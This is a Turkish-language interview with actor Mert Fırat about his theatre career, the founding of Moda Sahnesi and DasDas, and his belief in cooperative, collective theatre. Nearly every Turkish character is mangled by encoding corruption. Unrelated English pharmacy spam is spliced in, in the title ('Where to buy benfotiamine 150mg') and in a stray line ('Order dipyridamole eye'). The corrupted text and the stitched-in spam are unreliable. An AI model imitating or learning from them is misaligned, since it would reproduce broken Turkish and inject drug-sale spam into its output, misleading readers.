Where to buy benfotiamine 150mg PAi??nar Erol Sinequanone dresses shop online

Bir kiAYinin bu kadar kalabalAi??k olabileceAYini onda gAi??rdA?m ben. NemelazAi??mcAi??lara inat, birAi??ok oluAYumun iAi??inde yer alAi??yor. Sihirli kelimesi ai???temasai???. BA?yA?mek bAi??yle baAYlAi??yorai??i?? Beklemiyor, daha gA?zel bir dA?nya mA?mkA?n deyip kenara Ai??ekilmiyor; daha gA?zel bir dA?nyayAi?? inAYaa ediyor. SAi??ylediAYi hayatAi?? yaAYamaktaki tutarlAi??lAi??AYAi??, dA?AYmek-kalkmak gerAi??eAYinde ilerliyor; bunu biliyor. Elleri kaAi?? taAYAi?? kaldAi??rdAi?? sayamam. Birine gA?venmek gA?zel AYey. Ai??nsanAi??n kendi varlAi??AYAi??ndan hoAYnut olarak yaAYamasAi??, barAi??AYmasAi??, barAi??AYtAi??rmasAi?? daha da gA?zel. Bu Ai??oAYulcu tavrAi?? bile onu sevmeye yeterken, A?retmeye, Ai??Ai??zmeye, iyileAYtirmeye, sorgulamaya nitelik katan, hayattan bir manA? yeri gibi beslenen ve bunu sanatla yapan birine inanmanAi??n gA?zelliAYi heleai??i?? AnladAi??m ben; bir kiAYi, kalbine deAYdiAYi kiAYi kadar yer kaplAi??yor bu dA?nyada. O yA?zden bu kadar kalabalAi??k Mert FAi??rat. VerdiAYi ilham kaAi?? kiAYinin gA?nA?nA? baAYlatAi??yor bir bakAi??! Bu iAYte bana bA?yA?lA? gelen. BunlarAi?? koyacak baAYka bir yer bilmiyorum; kalbime dolduruyorum.

Oyuncu olmaya erken yaAYta karar veriyorsun. Ve bence bugA?n senaryo yazmanAi??n temelinde, Ai??AYrenciliAYinde Victorai??i??un size skeAi?? yazdAi??rmasAi?? olabilir.
Onun Ai??ok bA?yA?k etkisi var tabii. Bir AYey seyredip, dinleyip onu analiz etmeyi, onunla vakit geAi??irmeyi hep Victorai??i??un dAi??neminde edindiAYimiz bir alAi??AYkanlAi??AYa dAi??nA?AYtA?rdA?k. DolayAi??sAi??yla seyrettiAYinin arkasAi??na bakmayAi??, ya da okuduAYunun alt metnini Ai??nemsemeyi, ya da aslAi??nda ne diyor, bunu diyor da, yani ne diyor diye o zamanlar on iki, on A?Ai?? yaAYAi??nda sormaya baAYlamAi??AYtAi??m. Yine o yaAYlarda, Ai??tesine geAi??ip, tamam bunu sorduk, anladAi??k; AYimdi bunu nasAi??l dAi??nA?AYtA?rA?rA?z; nasAi??l kendi sAi??ylediAYimizi buluruz; kendi cA?mlelerimizle bu anladAi??AYAi??mAi??z AYeyi nasAi??l ifade ederiz diye dA?AYA?nmeye baAYladAi??m. OkuduklarAi??mAi??, seyrettiklerimi, birlikte Ai??Ai??kardAi??AYAi??mAi??z hikA?ye fikirlerini nasAi??l sahneye taAYAi??rAi??z, nasAi??l hayata geAi??iririz sorusunu erken yaAYta sormaya baAYladAi??m. Bunu yapan arkadaAYlarAi??mAi??n da Ai??oAYunun hayatAi??na katkAi??larAi?? olduAYunu gAi??rA?yorum. Erken yaAYta soru sormanAi??n, sorduAYun sorunun da sorumluluAYunu almanAi??n, baAYka sorulara sebep olmanAi??n faydasAi?? oluyor insana.

1993ai??i??te katAi??ldAi??AYAi??n ODTA? kA?rek takAi??mAi??nAi??n ve Halkeviai??i??nin de sende Ai??nemi bA?yA?k.
YaptAi??AYAi??m AYeylerden de eAYlenmeyi bildim hep aslAi??nda. Okurken, Ai??izerken, yazarken, kA?rek Ai??ekerken, canAi??mAi??n istemediAYi hiAi??bir AYeyi yapmadAi??m. Azimdi canAi??m oyunculuk yapmak istemezse, artAi??k yetersiz olduAYumu dA?AYA?nA?rsem, beni tatmin etmezse oyunculuk da yapmam.

Ai??lk kurduAYun tiyatro topluluAYunun SAi??hhiye PazarAi??ai??i??ndaki olduAYunu sAi??yleyebilir miyiz? Hem kAi??y seyirliAYin hem de tiyatronun gA?ndelik hayata dokunmasAi??nAi??n Ai??arpAi??cAi?? bir Ai??rneAYi.
Halkeviai??i??nin KA?ltA?r Sanat Merkeziai??i??ne giderken pazarAi??n iAi??inden bir geAi??iAY vardAi??. DolayAi??sAi??yla pazarcAi??larla komAYuyduk. OnlarAi??n Ai??atAi??AYmasAi??na Ai??ok net AYahit olduAYumuz iAi??in tiyatro olarak, bir KA?ltA?r Merkezi olarak, kA?Ai??A?k de olsak, kAi??sAi??tlAi?? imkA?nlarAi??mAi??z da olsa,Ai?? fayda saAYlayabileceAYimiz bir fAi??rsat varken niye deAYerlendirmeyelim diye dA?AYA?ndA?k hep. Ai??nsanlarda bir bilinAi?? oluAYturmak iAi??in mA?mkA?n mertebe o Ai??evrede bir AYeyler yapmaya Ai??alAi??AYtAi??k. Onu yaparken Ai??AYrendik aralarAi??ndaki o Ai??atAi??AYmayAi??. Sonra dedik ki gelin size oyun oynatalAi??m. Ai??lk Ai??nce kabul etmediler. Bu sefer gelin size oyun seyrettirelim dedik. Ai??yle dedik, bAi??yle dedikai??i?? Ai??lk Ai??nce iki kiAYi, A?Ai?? kiAYi, beAY kiAYi derken belli bir sayAi??ya ulaAYtAi??k. Ai??AYi gA?cA? bAi??rakAi??p koAYtur koAYtur gelmeseler de en son on dAi??rt – on beAY kiAYi olmuAYtuk.

1994-1998 yAi??llarAi?? arasAi??nda Ankaraai??i??da tiyatro festivali dA?zenliyorsunuz. Ai??lkine, sonradan Oyun AtAi??lyesiai??i??nde birlikte Ai??alAi??AYtAi??AYAi??nAi??z, daha sonra da Moda Sahnesiai??i??ni kurduAYunuz Kemal AydoAYanai??i??Ai?? da davet ediyorsun. Onu daha Ai??nce ai???Azrailai??i??in GAi??zyaAYlarAi??ai???nda izlemiAYsin. O da ai???Siz birincisini yapAi??n, biz ikincisine gelirizai??? diyor. DesteAYi bA?yA?k!
Ya evet evet, Ai??ok tatlAi??. Genco Erkal, Emre KAi??nay, BakAi??rkAi??y Belediye Tiyatrosu, rahmetli MA?AYfik Kenter, AYimdi bizim ai???FAi??rtAi??naai???da oynayan Ziver ArmaAYan AAi??Ai??l, o zamanlar ai???Mavi Sahneai??? diye kendi tiyatrosu vardAi??… Baya deAYerli tiyatrocu bir araya gelip o bizim Ankara buluAYmasAi??na destek oldular. Bir de okulun ilk festivalidir Ankara Tiyatro BuluAYmasAi??. Benim iAi??in Ai??zel bir AYeydi. KA?ltA?r BakanlAi??AYAi??ai??i??ndan o zamanAi??n parasAi??yla 6.500 lira bir destek almAi??AYtAi??m. YalnAi??z deAYildim ama Nil SavaAYai??i??la birlikte yaptAi??k. O zaman ai???Bizim Evin Halleriai??? dizisinden de bir AYeyler kazanAi??yordum. Onu da yanAi??na koyup, konaklama, ulaAYAi??m ve yemeyi de karAYAi??layarak bAi??yle bir festival yaptAi??k.

Ai??sveAi??ai??i??te sinema televizyon okuyup orada, SAi??der Theatreai??i??da vestiyerde, cafeai??i??de Ai??alAi??AYtAi??ktan ve ai???HastalAi??k HastasAi??ai???nda figA?ranlAi??k yaptAi??ktan sonra Ankaraai??i??ya dAi??nA?yorsun ve kanalda arAYiv bAi??lA?mA?nde Ai??alAi??AYAi??yorsun. Ai??SS sAi??navlarAi??nAi?? kaAi??Ai??rdAi??AYAi??nAi?? Ai??AYrenince Devlet TiyatrolarAi??ai??i??nAi??n seAi??melerine katAi??lAi??yorsun ve -filmlerdeki gibi- kazanmak Ai??ok kolay oluyor. KazAi??m AkAYarai??i??Ai??n ai???SuAi?? ve Cezaai???sAi??ndasAi??n artAi??k. Okullu olmadan alaylAi?? oluyorsun.
Aynen Ai??yle. Orada Gazi A?niversitesiai??i??nden kurulmuAY ai???Ya SabAi??r OyuncularAi??ai??? vardAi??. Onlarla NA?zAi??m AYiirlerinden, Kemal Tahirai??i??den derlenmiAY bir oyun oynadAi??m. Hayal meyal hatAi??rlAi??yorum ama eAYlenceliydi. Sinop -AyancAi??k ve Samsunai??i??a turne yapmAi??AYtAi??k. Bir yandan da Devlet TiyatrolarAi??ai??i??nda ai???SuAi?? ve Cezaai???yAi?? oynuyordum. SonrasAi??nda okulu kazandAi??m ama hep dizi-okul-tiyatro bir arada gitti.

2006ai??i??da okul tezin olan ai???Woyzeckai???i bitirdikten sonra teAYekkA?r etmek iAi??in birlikte Ai??alAi??AYtAi??AYAi??n arkadaAYlarAi??nAi?? aradAi??AYAi??nda, Hacettepeai??i??den arkadaAYAi??n Mustafa, Ai??stanbulai??i??da Oyun AtAi??lyesiai??i??nin ai???HAi??rAi??Ai??n KAi??zai??? seAi??melerinde olduAYunu sAi??ylA?yor. Sen de gidiyorsun, ai???AAYzAi?? Ai??iAi??ekli Adamai???Ai??n var hA?lihazAi??rda. Shakespeareai??i??den de ai???III. Richardai???Ai??n var ama hepsini oynayamadan ai???tamamai??? dediklerinde eyvah, olmadAi?? diye dA?AYA?nA?yor musun?
JA?ride Haluk Bilginerai??i??le birlikte rahmetli Ahmet Cemal de vardAi??. OnlarAi??n karAYAi??sAi??nda baya bir heyecan kaplamAi??AYtAi?? iAi??imi. GA?ldA?ler, eAYlendiler falan ama Ai??ok renk de vermediler. Ai??lginAi?? bir sAi??nav oldu benim iAi??in. ai???AAYzAi?? Ai??iAi??ekli Adamai??? herkesin Ai??alAi??AYtAi??AYAi?? bir oyundu, zorunlu parAi??a falan gibiydi. Benim Ai??stanbulai??i??daki ilk ai???auditionai???Ai??mdAi??. Ai??ncesinde dizi iAi??in gelmiAYtim. Sekiz bAi??lA?mlA?k bir yaz dizisiydi. O dizi, benim Ai??stanbulai??i??da bir sA?re yaAYamamAi?? saAYlamAi??AY oldu. O zaman aldAi??AYAi??mAi??z bir bAi??lA?m parasAi?? ancak kirayAi?? falan karAYAi??lAi??yordu. Bir yAi??lAi??mAi?? geAi??irebileceAYim bir olanak saAYladAi??AYAi?? iAi??in oyunda oynayabilirim diye dA?AYA?nA?p sevinmiAYtim.

Sonra ai???Bizim Evin Halleriai??? gibi hiAi?? bitmeyen bir ai???Testosteronai??? oyunu var beAY sezon sA?ren, ardAi??ndan aynAi?? kadroyla filmi yapAi??lan. SonrasAi??nda ai???Antonius ve Kleopatraai??? ile Globeai??i??da oynamak hele rA?ya gibi! Sahneye rakAi?? dAi??kmek, Shakespeareai??i??in tiyatrosuna oyun izlemeye deAYil de, oynamaya gitmekai??i??
O, Globeai??i??un festival iAi??in bize talep ettiAYi bir oyundu. Zaten Haluk Bilginer ve Kevork Malikyanai??i??Ai??n Globeai??i??la baAYlantAi??sAi?? vardAi??. OnlarAi??n vesilesiyle de gelip bizi seAi??tiler. O bir ritA?el. Herkes kendi geleneksel iAi??kisini Ai??n tarafa dAi??kA?yor ve o mistik bir hava ve koku veriyor. Sahnede kendini, kendi memleketindeki sahnede hissetmen iAi??in yapAi??yorlar bunu. Galiba Antik Yunanai??i??dan beri Apollonai??i??la, Dionysosai??i??un ritA?elistik tAi??renlerinde AYarabAi??n kA?plerden dAi??kA?ldA?AYA?, iAi??ildiAYi dA?nyaya Ai??ok gA?zel bir gAi??ndermesi var. Dublinai??i??de 60. Tiyatro Festivaliai??i??ne gittik. Orada da oyun Ai??ncesi yere iAi??ki dAi??kA?yorlar. Azimdi biz burada (DasDasai??i??ta) 4 Martai??i??ta Ai??Ai??kacak bir oyun Ai??alAi??AYacaAYAi??z. Bizim oyun da Ai??yle baAYlAi??yor.

Sonra tiyatro tozu, inAYaat tozuna karAi??AYAi??yor ve siz on iki kiAYi Moda Sahnesiai??i??ni kuruyorsunuz. Kolektif tiyatronun ete kemiAYe bA?rA?nen hali, hiyerarAYinin olmadAi??AYAi?? yeni bir yaAYam Ai??nermesi var onun. Bir kA?ltA?r hayatAi?? tesis oluyor.
SonrasAi??nda SanatMahalai??i??de de Ai??yle oldu. NilA?fer ilAi??esinde, GAi??rA?kle kAi??yA?nde. KampA?se iki yA?z – A?Ai?? yA?z metre uzaklAi??kta. Oradaki sahne, A?Ai?? yAi??ldAi??r Ai??AYrencilerle paylaAYAi??lmAi??yordu. Tiyatro etkinlikleri ya da amatAi??r tiyatro topluluklarAi?? desteklenmiyordu. Her isteyene, sAi??yleAYiye verilmiyordu. Orada Ai??yle bir sAi??kAi??ntAi?? vardAi?? malum baskAi??lardan dolayAi??. Bir rezalet vardAi?? Ai??zellikle Ai??ocuklar Ai??rgA?tlenmesin, soru sormasAi??n diye, hA?lA? da var. O yA?zden de orada Ai??aAYdaAY EAYitim Kooperatifi diye bir yapAi?? var. Ai??aAYdaAY okullar kurup karma bir yurtta kAi??zlAi??-erkekli eAYitime devam ettirme, bir yandan da birlikte yaAYama kA?ltA?rA?nA? geliAYtiren, bunu yaparken bir sapAi??klAi??k gA?tmeyen, kadAi??n – erkek bir arada yaAYayabilir ve illaki aralarAi??nda bir AYey geAi??mesi gerekmez dA?sturunu da gayet gA?zel anlatan harika bir yapAi??sAi?? var. TA?kiyeai??i??nin ilk EAYitim Kooperatifleriai??i??nden biri. Bu anlamda Ai??ok uzun yAi??llardAi??r, neredeyse bin beAY yA?zA?n A?stA?nde A?yesiyle Bursaai??i??da varlAi??AYAi??nAi?? sA?rdA?rA?yor. Bir yandan da diAYer illere ilham oluyor aslAi??nda. Anaokulu, ilkokulu, ortaokulu, lisesi, A?niversitesi iAi??in kollarAi?? sAi??vadAi??lar ve ilerliyorlar. Biz daha Ai??nce onlarAi??n Ai??ngAi??rA?leriyle kurulmuAY bir kA?ltA?r merkezini devraldAi??k. Ve aynen Moda Sahnesiai??i??ndeki on iki ortak gibi burada da on ortak kollarAi?? sAi??vadAi??k ve iAYe giriAYtik. Sonra onu yAi??kAi??p salonlarAi??nAi??, koltuklarAi??nAi??, akustik sistemlerinin tamamAi??nAi??, atAi??lyesini, dans iAi??in aynalAi?? bir stA?dyosunu yeniden yaptAi??k; sinemasAi??nAi?? deAYiAYtirdik derken bir kA?ltA?r merkezine dAi??nA?AYtA?rdA?k. Sonucu da Ai??ok iyi oldu. Moda Sahnesi sA?recini biliyorsun zaten. Azimdi DasDasai??i??ta da aynAi?? AYeyi yaAYadAi??k. GeAi??en sene buralar hep inAYaattAi??. SAi??fAi??rdan girip inAYaatAi??nAi?? yaptAi??AYAi??mAi??z tek yer burasAi?? aslAi??nda. DolayAi??sAi??yla inAYa etme ya da yeniden yapAi??lan hali sA?rekli devam ediyor olacak. Ai??A?nkA? biz salonlar, mekA?nlar yaratmak adAi??na bu iAYi yapAi??yoruz. Bazen alAi??AYveriAY merkezinin iAi??inde tiyatro olur mu diye yazAi??yorlar ya. GerAi??i burasAi?? Ai??yle deAYil; burasAi?? bir yaAYam merkezi. HoAY Ai??yle olsa da insanlar nerede, neye ihtiyaAi?? duyuyorlarsa, o orada olur, yeter ki ilkeli olsun. DurduAYu yerde Ai??evreyle problem yaAYamayan, Ai??evrenin hayatAi??na kast etmeyen, haksAi??zlAi??kla elde edilmemiAY, insanlarAi??n emeAYinin sAi??mA?rA?lmediAYi ya da yaAYam haklarAi??nAi??n elinden alAi??nmadAi??AYAi?? yerde bir sAi??kAi??ntAi?? yok benim iAi??in. DolayAi??sAi??yla Cevahirai??i??de de gidip oynarsAi??n, DasDasai??i??Ai?? da buraya kurarsAi??n. Benim iAi??in tiyatro camiasAi??nAi??n iAi??indeki o etik Ai??ok Ai??nemli ve o etiAYin iAi??inde, yA?zde yA?z tutumun ve tavrAi??n, sAi??ylediAYinin ve hareketinin birbirini tutmasAi?? A?zerine bir dA?zen var. O zaman mesela kredi kartlarAi??mAi??zla alAi??AYveriAY yapmayacaAYAi??z; tiyatro yaparken, maaAYlarAi?? Ai??derken kredi Ai??ekmeyeceAYiz. Bu biAi??imde sermaye ile iliAYkilenmeye ve tiyatro ve sanat yapmaya inanmAi??yoruz. Krediyle sanat olmaz. Bankalarla Ai??alAi??AYamayAi??z. Ne inAYaatAi?? yaparken ne sonrasAi??nda iAYletirken. Bu benim iAi??in ilkeli duruAY; hem kredi alAi??p arkasAi??ndan da sermaye sAi??ylemleri bana riyakA?rlAi??k ve ikiyA?zlA?lA?kten baAYka bir AYey ifade etmiyor.

Senin en bA?yA?k korkun mahcup olmak olabilir. Ai??alAi??AYanlarAi??na maaAYlarAi??nAi??, sigortalarAi??nAi?? Ai??deyememek gibi.
Burada, DasDasai??i??ta beAY ortaAYAi??z. Muzaffer YAi??ldAi??rAi??m inanAi??lmaz bir iAYadamAi??. GerAi??ekten tAi??rnaklarAi??yla bir yere gelmiAY ve vizyonerliAYiyle, hayata bakAi??AYAi??yla Ai??ok AYey katmAi??AY Ai??alAi??AYanlarAi??na ve ticari kA?ltA?re. Harun Tekin vizyonu olan bir sanatAi??Ai??, hem sAi??z yazarAi?? hem bir ozan, Ai??ok iyi bir vokal, harika bir gitarist. Koray Candemir iAi??in daha eksiAYini sAi??yleyemeyiz zaten. BambaAYka bir dinAi??lik, her daim taze bir ruh. Didem (BalAi??Ai??n) aynAi?? AYekilde. Ai??lksen (BaAYarAi??r) saAY olsun, aramAi??za katAi??ldAi?? her zaman olduAYu gibi. Genel KoordinatAi??r olarak, bir ai???maestroai??? gerAi??ekten kendisi. Hepimiz maddi, manevi ortaAYAi??z her noktada. Yukardan bir finansAi??r, tAi??rnak iAi??inde bir ai???sermayeai??? getirip ai???hadi Ai??ocuklar burasAi?? sizin oyun alanAi??nAi??z, hadi oyun oynayAi??nai??? demiyor. Biz burada maaAYAi??ndan sigortasAi??na, yemesinden iAi??mesine, personel yemeAYinden tatillerine, yazAi??n maaAY Ai??demesinden sigortasAi??na, iAYin idaresinden programlamasAi??na kadar her AYeyde birlikte karar alAi??p birlikte yA?rA?yoruz. Bir iAYletme kA?ltA?rA? Ai??AYreniyoruz. Bazen Ai??ok pahalAi??ya mal oluyor ama bizim iAi??in paha biAi??ilmez bir tecrA?be. Mutluyuz da, sonucu da bizi tatmin ediyor. Bize inanan, sponsorluk ve destek veren AYirketler var. Onlarla da gayet mutluyuz. Bizim iAi??in bu bir yol. Yeni salonlar aAi??mak da Ai??yle. ArzAi?? da talebi de artAi??ralAi??m. Seyircinin gelmesini beklemeyelim; biz gidelim. Mesela neden AtaAYehirai??i??de tiyatro var diye bir yazAi?? vardAi??. Ben o yazAi??ya hiAi?? takAi??lmadAi??m. HaklAi?? olarak bu Tiyatro Festivaliai??i??nde, mesafeler uzak olduAYu iAi??in yetiAYememekten kaynaklAi?? bir Ai??fkeyle yazAi??lmAi??AY. Yoksa aslAi??nda tanAi??yoruz yazanAi??, Ai??ok sevdiAYimiz, saydAi??AYAi??mAi??z, Ai??ok da emeAYi olan birisi. DA?nyanAi??n her tarafAi??nda insanlar bir yerden bir yere hareket ediyor. Ve tiyatro hareket ettirtir, tiyatro Ai??zgA?rleAYtirir, baAYAi??msAi??zlaAYtAi??rAi??r. Tam da Festivalai??i??in bu seneki cA?mlesi gibi. Harekete geAi??irmiyorsa, senin yapmanAi??n bir anlamAi?? yoktur. Ve fiilen buraya gelmen de bir harekete geAi??mektir. Seyircimizin yA?zde otuzu-kAi??rkAi?? Avrupa yakasAi??ndan geliyor AtaAYehirai??i??e. SatAi??AY oranAi??ndan bunu tahlil edebiliyoruz. YA?zde kAi??rk da AtaAYehir eAYrafAi??ndan seyircimiz var. Azimdi bu insanlarAi??n ayaAYAi??na gelmiAY olmak, burada bir tiyatro kA?ltA?rA? oluAYturmak, bir mA?zik kA?ltA?rA? oluAYturmakai??i?? Harun Tekinai??i??in AYarkAi?? yazarlAi??AYAi?? atAi??lyesi var. Ve o kadar deAYerli ki oraya on iki kiAYi katAi??lAi??yor. Ai??Ai??lerinden biri savaAY uAi??aAYAi?? uAi??uran pilot, biri hA?lihazAi??rda metin yazarAi??, zaten kendi mA?ziAYini yapmaya baAYlamAi??AY on sekiz yaAYAi??nda bir Ai??ocuk. Bizim ai???Bir VarmAi??AY Bir YokmuAYai???un mA?ziklerini yapan Judith Lieberman, her yerde hikA?yesini anlatan, masallarAi??nAi?? anlatan, AYimdi ikinci kitabAi??nAi?? Ai??Ai??kartmAi??AY birisi. Bizler birbirimizle destekleAYe destekleAYe bir yere gelip bir AYeyler yapAi??yoruz aslAi??nda. Harun Tekin ai???mor ve Ai??tesiai???nin o yirmi yAi??llAi??k hevesini, tecrA?besini, isteAYini buraya yansAi??tAi??yor. Ben elimden geldiAYince tiyatroda aynAi?? AYeyi yapmaya Ai??alAi??AYAi??yorum. Didem keza, tA?m Ai??evresi,Ai?? ailesi ve arkadaAYlarAi??yla bA?yA?k katkAi?? saAYlAi??yor. Muzaffer ve Koray aynAi?? AYekilde. BunlarAi??n hepsinin deAYerli olduAYunu dA?AYA?nA?yorum. Yoksa tiyatro BeyoAYluai??i??ndadAi??r, KadAi??kAi??yai??i??dedir. EAYer alAi??AYveriAY merkezleri bu kadar yakAi??nlarsa bize, onlarAi??n kAi??AYelerine, bucaklarAi??na aAi??Ai??lmak zorundayAi??z biz de. Bu tercihleri insanlara sunabiliyor olmak lazAi??m. ErdoAYan Mitrani Tarabyaai??i??dan kalkAi??p ai???When in Romeai???u izlemeye buraya geliyorsa, bir saat on dakika sA?rA?yor yol ve bu kayAi??p deAYil, ben yolda kitabAi??mAi?? okuyorum diyorsa, bu baAYka bir AYey. Diyor ki tiyatro benim iAi??in bAi??yledir. Ai??nsanAi??n ona yarAi??m gA?nA?nA? ayAi??racaAYAi??nAi?? bilirim. Sabah ona gAi??re kalkar, giyinir, yemeAYimi hafif yer, yolda oyunun metnini okurum, kim oynamAi??AY, tasarAi??mcAi??sAi?? kimmiAY onlara bakarAi??m. Oyundan Ai??Ai??kAi??nca da dAi??nA?AY yolunda bunlarAi?? dA?AYA?nA?rA?m. TA?ketim toplumunun tam da bizim Ai??nA?mA?ze koyduAYu bAi??yle bir AYey. Merkeze git, merkezde tA?ket ve Ai??Ai??k. Bu da yaptAi??AYAi??mAi??z iAYin saAYlamasAi??nAi?? yapan, bir yandan da olumlayan bir AYey.

Evden Ai??te bir AYey oluyor sahne.
Sadece AtaAYehirai??i??de dAi??rt yA?z elli bin nA?fus var. Ve biz bu nA?fusun otuz kAi??rk binini buraya getiremiyorsak, bizimle ilgili bir problem vardAi??r. Bizim Ai??lAi??eAYimizdeki tiyatrolarAi?? dAi??ndA?ren AYey bu sayAi??daki sadakatli seyircidir. Bu sayAi??ya sahip bir tiyatro, hayatAi??na devam edebilir. Bizim yapmamAi??z gereken, buradaki nA?fusun yA?zde onuna temas edip, bir AYey sAi??ylemek, farkAi??ndalAi??klarAi??na sebep olmak.
Order dipyridamole eye
Ai??AYrenciyken para denkleAYtirip kaAi?? oyununu izleyebilirim dediAYin Ai??KSVai??i??nin Tiyatro Festivaliai??i??ne, Moda Sahnesi ve DasDas hem ev sahipliAYi yaptAi?? hem de ai???FAi??rtAi??naai???, ai???Uyarcaai??? gibi yapAi??tlarAi??yla iAi??inde yer aldAi??. Daha Ai??nce bunu vapurda evlilik teklifi alAi??nca oluAYan o manasAi??z gA?lA?msemeye benzetmiAYtin. Azimdi neye benzetirsin?
Tabii ki yine heyecanlandAi??rAi??yor. Leman (YAi??lmaz) HanAi??m Ai??yle gA?zel devraldAi?? ki, Handan (Uzal DA?ndar), Leman, GAi??rgA?n (Taner) Bey mA?kemmel bir takAi??mlar. Festival insanlara bir alAi??AYkanlAi??k kazandAi??rAi??yor. TA?m ekibin bu iAYe, bu kadar ciddiyetle eAYilmeleri ve her yAi??l yapmaya niyetlenmeleri, bu anlamda yerli yapAi??mlarAi?? da gA?Ai??lendirmeleri, hatta onlara da bir yAi??netim ve disiplin getiriyor olmasAi?? Ai??nemli. Hadi bak, sezon geliyor, oyununu Ai??Ai??kart diyorlar. DolayAi??sAi??yla bir yAi??l Ai??nceden programlama yapmayAi?? Ai??AYretiyorlar insanlara. Bu disiplin ve motivasyon festivalin kendisi oluyor. Ai??ngAi??rA? ve bA?tAi??e lazAi??m. Bu kA?ltA?rA? Ai??neriyorlar, bu Ai??ok Ai??nemli. DolayAi??sAi??yla festival beni vapurda evlilik teklifi alma ihtimalinden Ai??ok daha fazla heyecanlandAi??rAi??yor AYimdi.

Ai??Ai??inde bulunduAYun oluAYumlar yetmezmiAY gibi bir de Kutu Film, SanatMahal ve Ai??htiyaAi?? HaritasAi?? var. AltmAi??AY A?Ai?? tiyatrodan oluAYan KadAi??kAi??y Tiyatro Platformu var. Sen kendi baAYAi??na hareket etmeyi sevmiyor musun, niye hep oluAYumlarAi??n iAi??indesin, niye hep oluAYturuyorsun?
Ai??A?nkA? biz bir vesileyiz. Tiyatro da baAYka bir kA?ltA?re, etkileAYime, oluAYuma vesile olan bir AYey. AzAi??yle gA?zel bir yAi??nA? var tiyatronun; en az iki kiAYi olmak zorunda: Bir oyuncu, bir izleyici. DolayAi??sAi??yla bir kiAYinin alacaAYAi?? kararlarla ilerleyebilecek, tAi??rnak iAi??inde bir kiAYinin estetiAYiyle, etiAYiyle ya da bilgisiyle ilerleyebilecek bir yapAi??da deAYil. O yA?zden kolektifin iAYi tiyatro. SanatAi??n iAi??inde kolektif ve mA?AYterekliAYin azaldAi??AYAi?? nokta, seslerin tek olmaya baAYladAi??AYAi?? nokta, bittiAYi yerdir zaten. StoacAi?? aklAi??n A?rettiAYi sanattan baAYka bir AYey olmaz o; o da sanat olmaz. Neyin sanat olduAYu da ayrAi??ca tartAi??AYAi??lAi??r bence. Azu ortamda da tartAi??AYAi??lmasAi?? gereken AYeylerden biridir aslAi??nda. Biz AYimdi birbirimizi oluAYturmaktan, hayata belli bir standart oturtmaktan, o Ai??zeleAYtirileri ya da karAYAi??lAi??klAi?? eleAYtirileri yapmaya fAi??rsat bulamAi??yoruz, daha oraya gelemiyoruz.

Kendi adAi??ma sAi??yleyebileceAYim AYey AYu: Bana bu gA?nlerde tiyatrodan daha iyi gelen bir AYey yok. SanatAi??n bana yaptAi??AYAi??nAi??n, gA?ndelik hayatAi??mdaki etkilerinin farkAi??ndayAi??m. BaAYka kimlere nasAi??l dokunduAYunu dA?AYA?nmek bile heyecan verici.
En basit Ai??rneAYini sAi??yleyeyim sana; SanatMahal mesela, anonim AYirketten kooperatife dAi??nmA?AY bir yer. Kooperatifin ruhunu almAi??AY tam da Ai??aAYdaAY EAYitim Kooperatifi gibi bu sana bahsettiAYim bin yedi yA?z kiAYinin A?yesi olduAYu kooperatifin ilamAi?? gibi. Ai??htiyaAi?? HaritasAi?? da bir kooperatiftir. Ai??A?nkA? biz ai???co-operationai???a inanAi??yoruz, birlikte Ai??alAi??AYma kA?ltA?rA?ne inanAi??yoruz. Herkesin hissesi oranAi??nda sesinin olmasAi??na deAYil, ne kadar hissen olursa olsun, demokratik koAYullar altAi??nda sAi??zA?nA? sAi??yleyebilme ilkesine inanAi??yoruz. On kiAYinin iAi??inde, bir kiAYi hayAi??r diyorsa, dokuz kiAYinin o ai???hayAi??rai???Ai?? gAi??z ardAi?? ederek ulaAYtAi??AYAi?? karar, demokratik deAYildir. Benim anladAi??AYAi??m demokrasi o deAYil. Ai??AYler hAi??zlAi?? ilerlesin diye birAi??ok AYeyi gAi??z ardAi?? etmiAY oluyoruz. Bizim birbirimizi deAYiAYtirmekten Ai??te; birbirimizi ikna etmeye, birbirimizi anlamaya ihtiyacAi??mAi??z var. Bu ihtiyaAi?? HaritasAi??ai??i??ndaki ortaklarAi??mAi??n ilhamAi??yla gerAi??ekleAYmiAY bir AYey. Oradaki maksat parayAi?? bAi??lA?AYmek deAYil; yetkiyi, sorumluluAYu bAi??lA?AYmek. Kolektif bir AYey kurmak sadece sAi??zde kalabilir, Ai??nemli olan bunun dahlini yaratabilmek. Demokrasi kA?ltA?rA? dediAYin AYey, mahalle topluluklarAi??nAi?? yaratAi??p aynAi?? KAi??y EnstitA?leri, Halkevleri gibi, 1950ai??i??ler Ai??ncesi gibi, mahalle ve kiAYilerin dahlini yaratmak. Ai??htiyaAi?? HaritasAi??ai??i??nda onu yapmaya Ai??alAi??AYAi??yoruz, SanatMahalai??i??de onu yapmaya Ai??alAi??AYAi??yoruz. Diyoruz ki, ey seyirci oyununu talep et, kalite talep et, de ki bu bilet fiyatlarAi?? niye bAi??yle? Ben de sana diyeyim ki, gel bilet fiyatlarAi?? ve tiyatroyla ilgili hep beraber oturalAi??m, sAi??yleAYi yapalAi??m ve anlayalAi??m bakalAi??m bir biletin maliyeti bize ne imiAY. Ai??AYte bunlarAi??n gelmesi hep vizyon.

Muhalif olmak, sorgulayAi??cAi?? olmak ekmek gibi, su gibi, nefes almak gibi doAYal geliyor sana. ai???KAi??rmAi??zAi?? Koltukai???, ai???32. GA?nai???, Ankaraai??i??da Ai??Ai??kan ai???Siyah-Beyazai??? gazetesi, KAi??y EnstitA?leri, Halk Evleri bakAi??AY aAi??Ai??sAi?? oluAYturmakta. O bakAi??AY aAi??Ai??sAi??nAi??n gerektirdiAYi yaAYamAi?? yaAYamaktaki Ai??srarAi??n ve tutarlAi??lAi??AYAi??nla bence ilham oluyorsun.
